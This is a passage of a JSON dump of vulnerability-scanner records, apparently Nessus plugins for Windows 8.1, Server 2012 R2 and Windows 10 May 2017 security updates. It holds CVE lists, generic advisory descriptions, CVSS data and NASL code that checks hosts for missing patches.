\"CVE-2017-0238\",\n \"CVE-2017-0246\",\n \"CVE-2017-0248\",\n \"CVE-2017-0258\",\n \"CVE-2017-0259\",\n \"CVE-2017-0263\",\n \"CVE-2017-0267\",\n \"CVE-2017-0268\",\n \"CVE-2017-0269\",\n \"CVE-2017-0270\",\n \"CVE-2017-0271\",\n \"CVE-2017-0272\",\n \"CVE-2017-0273\",\n \"CVE-2017-0274\",\n \"CVE-2017-0275\",\n \"CVE-2017-0276\",\n \"CVE-2017-0277\",\n 
\"CVE-2017-0278\",\n \"CVE-2017-0279\",\n \"CVE-2017-0280\"\n );\n script_bugtraq_id(\n 98097,\n 98102,\n 98103,\n 98108,\n 98112,\n 98113,\n 98114,\n 98117,\n 98121,\n 98127,\n 98139,\n 98164,\n 98173,\n 98237,\n 98258,\n 98259,\n 98260,\n 98261,\n 98263,\n 98264,\n 98265,\n 98266,\n 98267,\n 98268,\n 98270,\n 98271,\n 98272,\n 98273,\n 98274,\n 98298\n );\n script_xref(name:\"MSKB\", value:\"4019215\");\n script_xref(name:\"MSKB\", value:\"4019213\");\n script_xref(name:\"MSFT\", value:\"MS17-4019215\");\n script_xref(name:\"MSFT\", value:\"MS17-4019213\");\n script_xref(name:\"IAVA\", value:\"2017-A-0148\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/10\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/25\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n\n script_name(english:\"Windows 8.1 and Windows Server 2012 R2 May 2017 Security Updates\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4019213\nor cumulative update 4019215. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A security bypass vulnerability exists in Internet\n Explorer due to an unspecified flaw. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website, to bypass mixed\n content warnings and load insecure content (HTTP) from\n secure locations (HTTPS). (CVE-2017-0064)\n\n - An elevation of privilege vulnerability exists in\n Windows in the Microsoft DirectX graphics kernel\n subsystem (dxgkrnl.sys) due to improper handling of\n objects in memory. A local attacker can exploit this,\n via a specially crafted application, to execute\n arbitrary code in an elevated context. 
(CVE-2017-0077)\n\n - A denial of service vulnerability exists in the Windows\n DNS server when it's configured to answer version\n queries. An unauthenticated, remote attacker can exploit\n this, via a malicious DNS query, to cause the DNS server\n to become nonresponsive. (CVE-2017-0171)\n\n - An information disclosure vulnerability exists in the\n Windows Graphics Device Interface (GDI) due to improper\n handling of objects in memory. A local attacker can\n exploit this, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-0190)\n\n - An elevation of privilege vulnerability exists in the\n Windows COM Aggregate Marshaler due to an unspecified\n flaw. A local attacker can exploit this, via a specially\n crafted application, to execute arbitrary code with\n elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper validation of user-supplied\n input when loading type libraries. A local attacker can\n exploit this, via a specially crafted application, to\n gain elevated privileges. (CVE-2017-0214)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0222)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0226)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. 
An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0228)\n\n - A spoofing vulnerability exists in Microsoft browsers\n due to improper rendering of the SmartScreen filter. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted URL, to redirect users to a malicious\n website that appears to be a legitimate website.\n (CVE-2017-0231)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript scripting engines\n due to improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Office document, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-0238)\n\n - An elevation of privilege vulnerability exists in the\n win32k component due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. Note that an attacker can\n also cause a denial of service condition on Windows 7\n x64 or later systems. (CVE-2017-0246)\n\n - A security bypass vulnerability exists in the Microsoft\n .NET Framework and .NET Core components due to a failure\n to completely validate certificates. An attacker can\n exploit this to present a certificate that is marked\n invalid for a specific use, but the component uses it\n for that purpose, resulting in a bypass of the Enhanced\n Key Usage taggings. (CVE-2017-0248)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. 
(CVE-2017-0258)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0259)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel-mode driver due to improper handling of\n objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-0263)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. 
An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. 
An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0280)\");\n # https://support.microsoft.com/en-us/help/4019215/windows-8-update-kb4019215\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?09cc032f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4019213 or Cumulative update KB4019215.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0272\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n 
script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS17-05';\nkbs = make_list(\n '4019213', # 8.1 / 2012 R2 Security Only\n '4019215' # 8.1 / 2012 R2 Monthly Rollup\n);\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(exit_on_fail:TRUE, 
as_share:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\n# Windows 8.1 / Windows Server 2012 R2\nif ( smb_check_rollup(os:\"6.3\", sp:0, rollup_date: \"05_2017\", bulletin:bulletin, rollup_kb_list:[4019213, 4019215]) )\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T16:22:04", "description": "The remote Windows 10 version 1507 host is missing security update KB4019474. It is, therefore, affected by multiple vulnerabilities :\n\n - A security bypass vulnerability exists in Internet Explorer due to an unspecified flaw. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to bypass mixed content warnings and load insecure content (HTTP) from secure locations (HTTPS). (CVE-2017-0064)\n\n - An elevation of privilege vulnerability exists in Windows in the Microsoft DirectX graphics kernel subsystem (dxgkrnl.sys) due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code in an elevated context. (CVE-2017-0077)\n\n - An information disclosure vulnerability exists in the Windows Graphics Device Interface (GDI) due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0190)\n\n - An elevation of privilege vulnerability exists in Windows Hyper-V due to improper validation of vSMB packet data. An unauthenticated, adjacent attacker can exploit this to gain elevated privileges.\n (CVE-2017-0212)\n\n - An elevation of privilege vulnerability exists in the Windows COM Aggregate Marshaler due to an unspecified flaw. 
A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in Windows due to improper validation of user-supplied input when loading type libraries. A local attacker can exploit this, via a specially crafted application, to gain elevated privileges. (CVE-2017-0214)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0222)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0226)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0227)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0228)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. 
An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0229)\n\n - A spoofing vulnerability exists in Microsoft browsers due to improper rendering of the SmartScreen filter. An unauthenticated, remote attacker can exploit this, via a specially crafted URL, to redirect users to a malicious website that appears to be a legitimate website.\n (CVE-2017-0231)\n\n - An elevation of privilege vulnerability exists in Microsoft Edge due to improper sandboxing. An unauthenticated, remote attacker can exploit this to break out of the Edge AppContainer sandbox and gain elevated privileges. (CVE-2017-0233)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the Chakra JavaScript engine due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0234)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the Chakra JavaScript engine due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0236)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Office document, to execute arbitrary code in the context of the current user. 
(CVE-2017-0238)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or to open a specially crafted Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0240)\n\n - An elevation of privilege vulnerability exists in Microsoft Edge due to improper rendering of a domain-less page in the URL. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to cause the user to perform actions in the context of the Intranet Zone and access functionality that is not typically available to the browser when browsing in the context of the Internet Zone. (CVE-2017-0241)\n\n - An elevation of privilege vulnerability exists in the win32k component due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated permissions. Note that an attacker can also cause a denial of service condition on Windows 7 x64 or later systems. (CVE-2017-0246)\n\n - A security bypass vulnerability exists in the Microsoft .NET Framework and .NET Core components due to a failure to completely validate certificates. An attacker can exploit this to present a certificate that is marked invalid for a specific use, but the component uses it for that purpose, resulting in a bypass of the Enhanced Key Usage taggings. (CVE-2017-0248)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper initialization of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0258)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper initialization of objects in memory. 
A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0259)\n\n - An elevation of privilege vulnerability exists in the Windows kernel-mode driver due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to run arbitrary code in kernel mode. (CVE-2017-0263)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. 
An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. 
An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0280)", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-09T00:00:00", "type": "nessus", "title": "KB4019474: Windows 10 Version 1507 May 2017 Cumulative Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0064", "CVE-2017-0077", "CVE-2017-0190", "CVE-2017-0212", "CVE-2017-0213", "CVE-2017-0214", "CVE-2017-0222", "CVE-2017-0226", "CVE-2017-0227", "CVE-2017-0228", "CVE-2017-0229", "CVE-2017-0231", "CVE-2017-0233", "CVE-2017-0234", "CVE-2017-0236", "CVE-2017-0238", "CVE-2017-0240", "CVE-2017-0241", "CVE-2017-0246", "CVE-2017-0248", "CVE-2017-0258", "CVE-2017-0259", "CVE-2017-0263", "CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0269", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0272", "CVE-2017-0273", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276", "CVE-2017-0277", "CVE-2017-0278", "CVE-2017-0279", "CVE-2017-0280"], "modified": "2022-03-29T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_MAY_4019474.NASL", "href": "https://www.tenable.com/plugins/nessus/100061", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100061);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/29\");\n\n script_cve_id(\n \"CVE-2017-0064\",\n \"CVE-2017-0077\",\n \"CVE-2017-0190\",\n \"CVE-2017-0212\",\n \"CVE-2017-0213\",\n \"CVE-2017-0214\",\n \"CVE-2017-0222\",\n \"CVE-2017-0226\",\n 
\"CVE-2017-0227\",\n \"CVE-2017-0228\",\n \"CVE-2017-0229\",\n \"CVE-2017-0231\",\n \"CVE-2017-0233\",\n \"CVE-2017-0234\",\n \"CVE-2017-0236\",\n \"CVE-2017-0238\",\n \"CVE-2017-0240\",\n \"CVE-2017-0241\",\n \"CVE-2017-0246\",\n \"CVE-2017-0248\",\n \"CVE-2017-0258\",\n \"CVE-2017-0259\",\n \"CVE-2017-0263\",\n \"CVE-2017-0267\",\n \"CVE-2017-0268\",\n \"CVE-2017-0269\",\n \"CVE-2017-0270\",\n \"CVE-2017-0271\",\n \"CVE-2017-0272\",\n \"CVE-2017-0273\",\n \"CVE-2017-0274\",\n \"CVE-2017-0275\",\n \"CVE-2017-0276\",\n \"CVE-2017-0277\",\n \"CVE-2017-0278\",\n \"CVE-2017-0279\",\n \"CVE-2017-0280\"\n );\n script_bugtraq_id(\n 98099,\n 98102,\n 98103,\n 98108,\n 98112,\n 98113,\n 98114,\n 98117,\n 98121,\n 98127,\n 98139,\n 98164,\n 98173,\n 98179,\n 98203,\n 98208,\n 98217,\n 98229,\n 98234,\n 98237,\n 98258,\n 98259,\n 98260,\n 98261,\n 98263,\n 98264,\n 98265,\n 98266,\n 98267,\n 98268,\n 98270,\n 98271,\n 98272,\n 98273,\n 98274,\n 98281,\n 98298\n );\n script_xref(name:\"MSKB\", value:\"4019474\");\n script_xref(name:\"MSFT\", value:\"MS17-4019474\");\n script_xref(name:\"IAVA\", value:\"2017-A-0148\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/10\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/25\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n\n script_name(english:\"KB4019474: Windows 10 Version 1507 May 2017 Cumulative Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows 10 version 1507 host is missing security update\nKB4019474. It is, therefore, affected by multiple vulnerabilities :\n\n - A security bypass vulnerability exists in Internet\n Explorer due to an unspecified flaw. 
An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website, to bypass mixed\n content warnings and load insecure content (HTTP) from\n secure locations (HTTPS). (CVE-2017-0064)\n\n - An elevation of privilege vulnerability exists in\n Windows in the Microsoft DirectX graphics kernel\n subsystem (dxgkrnl.sys) due to improper handling of\n objects in memory. A local attacker can exploit this,\n via a specially crafted application, to execute\n arbitrary code in an elevated context. (CVE-2017-0077)\n\n - An information disclosure vulnerability exists in the\n Windows Graphics Device Interface (GDI) due to improper\n handling of objects in memory. A local attacker can\n exploit this, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-0190)\n\n - An elevation of privilege vulnerability exists in\n Windows Hyper-V due to improper validation of vSMB\n packet data. An unauthenticated, adjacent attacker can\n exploit this to gain elevated privileges.\n (CVE-2017-0212)\n\n - An elevation of privilege vulnerability exists in the\n Windows COM Aggregate Marshaler due to an unspecified\n flaw. A local attacker can exploit this, via a specially\n crafted application, to execute arbitrary code with\n elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper validation of user-supplied\n input when loading type libraries. A local attacker can\n exploit this, via a specially crafted application, to\n gain elevated privileges. (CVE-2017-0214)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. 
(CVE-2017-0222)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0226)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the scripting engines due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website or open a specially\n crafted Microsoft Office document, to execute arbitrary\n code in the context of the current user. (CVE-2017-0227)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0228)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0229)\n\n - A spoofing vulnerability exists in Microsoft browsers\n due to improper rendering of the SmartScreen filter. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted URL, to redirect users to a malicious\n website that appears to be a legitimate website.\n (CVE-2017-0231)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Edge due to improper sandboxing. 
An\n unauthenticated, remote attacker can exploit this to\n break out of the Edge AppContainer sandbox and gain\n elevated privileges. (CVE-2017-0233)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the Chakra JavaScript engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0234)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the Chakra JavaScript engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Office document, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-0236)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript scripting engines\n due to improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Office document, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-0238)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the scripting engines due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website or to open a\n specially crafted Office document, to execute arbitrary\n code in the context of the current user. (CVE-2017-0240)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Edge due to improper rendering of a\n domain-less page in the URL. 
An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to cause the user to\n perform actions in the context of the Intranet Zone and\n access functionality that is not typically available to\n the browser when browsing in the context of the Internet\n Zone. (CVE-2017-0241)\n\n - An elevation of privilege vulnerability exists in the\n win32k component due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. Note that an attacker can\n also cause a denial of service condition on Windows 7\n x64 or later systems. (CVE-2017-0246)\n\n - A security bypass vulnerability exists in the Microsoft\n .NET Framework and .NET Core components due to a failure\n to completely validate certificates. An attacker can\n exploit this to present a certificate that is marked\n invalid for a specific use, but the component uses it\n for that purpose, resulting in a bypass of the Enhanced\n Key Usage taggings. (CVE-2017-0248)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0258)\n\n - An information disclosure 